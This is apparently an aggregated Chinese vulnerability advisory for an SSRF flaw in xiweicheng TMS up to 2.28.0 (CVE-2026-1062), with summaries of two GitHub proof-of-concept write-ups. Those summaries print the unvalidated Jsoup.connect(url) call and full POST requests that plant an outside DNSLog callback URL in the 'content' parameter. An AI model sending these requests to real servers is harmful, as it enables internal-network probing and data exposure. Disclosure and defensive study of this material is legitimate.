# xiweicheng TMS 漏洞,版本未知,服务器端请求伪造。
## 概述
xiweicheng TMS 在版本 2.28.0 及以下存在服务器端请求伪造(SSRF)漏洞,位于 `src/main/java/com/lhjz/portal/util/HtmlUtil.java` 文件的 `Summary` 函数。
## 影响版本
xiweicheng TMS ≤ 2.28.0
## 细节
`HtmlUtil.java` 中的 `Summary` 函数未对传入的 `url` 参数进行有效校验和过滤,攻击者可操控该参数发起任意网络请求。
## 影响
攻击者可利用该漏洞从服务器端发起远程请求,可能访问内部系统或绕过防火墙限制,实现信息泄露、服务探测或进一步攻击。漏洞利用方式已公开,存在被远程利用的风险。
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: CVE-md/商户商城—商城开发tms/SSRF(2).md at main · bkglfpp/CVE-md · GitHub -- 🔗来源链接
标签:exploit
神龙速读:
### 关键信息
#### 漏洞描述
- **系统名称**: Merchant Mall
- **系统版本**: TMS
- **漏洞类型**: SSRF (Server-Side Request Forgery)
#### 漏洞复现
- **文件位置**: `src/main/java/com/lhjz/portal/util/HtmlUtil.java`
- **易受攻击参数**: `content`
#### 代码示例
- **涉及类**: `BlogController.java`, `AsyncTask.java`, `HtmlUtil.java`
- **关键代码段**:
```java
public static String summary(String url) {
try {
Document doc = Jsoup.connect(url).get(); // SSRF点
} catch (IOException e) {
e.printStackTrace();
}
...
}
```
#### 攻击步骤
- **攻击者构造参数**: `content=http://asnmlzkhx.zaza.eu.org`
- **请求示例**:
```http
POST /admin/blog/comment/create HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
basePath=&id=1&content=http://asnmlzkhx.zaza.eu.org&editor=&uuid=
```
#### DNS Log
- **使用的工具**: Yakit 自带的 DNSLog 反连服务
- **激活域名**: `asnmlzkhx.zaza.eu.org`
- **记录**: 记录了DNS请求的时间戳和IP地址
#### 数据包
- **完整的HTTP请求示例**:
```http
POST /admin/blog/comment/create HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded
basePath=&id=1&content=http://asnmlzkhx.zaza.eu.org&editor=&uuid=
```
标题: CVE-md/商户商城—商城开发tms/SSRF(1).md at main · bkglfpp/CVE-md · GitHub -- 🔗来源链接
标签:related
神龙速读:
## 关键信息总结
### 漏洞概述
- **漏洞类型**: SSRF (Server-Side Request Forgery)
- **影响系统**: Merchant Mall - 商户商城的TMS系统
### 漏洞描述
- **文件位置**: `src/main/java/com/lhjz/portal/util/HtmlUtil.java`
- **漏洞参数**: `content`
- **关键代码位置**: `HtmlUtil.java` 中的 Line 97
### 漏洞复现步骤
#### 触发点
- **代码片段**:
```java
Document doc = Jsoup.connect(url).get();
```
- **数据流**: 从用户输入的`content`参数中提取的`lastLine`值在没有特殊处理的情况下被传入该函数,导致SSRF漏洞。
#### 请求细节
- **请求方法**: POST
- **URL**: `/admin/chat/channel/create`
- **关键参数**: `content`参数中包含可控制的URL值 (`http://vqeeedzoaif.zaza.eu.org`)
#### 后果
- 攻击者可以通过构造特定的请求,利用`content`参数中的URL值,对内网进行探测和攻击。
### 验证
- 通过向`/admin/chat/channel/create`接口发送包含特定URL的POST请求,可以观察到服务器尝试访问该URL,验证了SSRF漏洞的存在。
标题: Login required -- 🔗来源链接
标签:signaturepermissions-required
神龙速读:
- **Vulnerability ID**: VDB-341630
- **CVE Identifier**: CVE-2026-1062
- **EUVD Identifier**: EUVD-2026-3131
- **Affected Software**: XIWEICHENG TMS up to 2.28.0
- **Vulnerable File**: HTMLUtil.java
- **Vulnerability Type**: URL Server-Side Request Forgery
- **Access Note**: Requires login to view details
暂无评论